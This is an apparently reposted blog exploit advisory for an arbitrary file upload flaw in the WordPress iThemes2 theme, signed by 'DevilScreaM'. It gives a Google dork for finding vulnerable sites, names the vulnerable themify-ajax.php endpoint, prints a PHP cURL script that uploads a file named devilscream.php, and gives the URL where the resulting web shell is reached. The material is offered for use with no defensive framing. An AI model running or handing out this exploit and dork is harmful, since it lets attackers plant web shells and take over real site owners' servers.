Thursday, November 21, 2013

Wordpress iThemes2 Themes Arbitrary File Upload D


By on 3:21 AM

#Title : Wordpress iThemes2 Themes Arbitrary File Upload 

#Author : DevilScreaM

#Date : 11/20/2013 - 20 November 2013

#Category : Web Applications

#Type : PHP

#Vendor : http://themify.me/

#Link : http://themify.me/themes/ithemes2

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : Arbitrary File Upload

#Dork :

inurl:wp-content/themes/ithemes2


Arbitrary File Upload

Exploit : http://SITE-TARGET/wp-content/themes/ithemes2/themify/themify-ajax.php

Script :

<?php
$uploadfile="devilscream.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/ithemes2/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


Shell Access :

http://SITE-TARGET/wp-content/themes/ithemes2/uploads/devilscream.php

About Syed Faizan Ali

Faizan is a 17 year old young guy who is blessed with the art of Blogging,He love to Blog day in and day out,He is a Website Designer and a Certified Graphics Designer.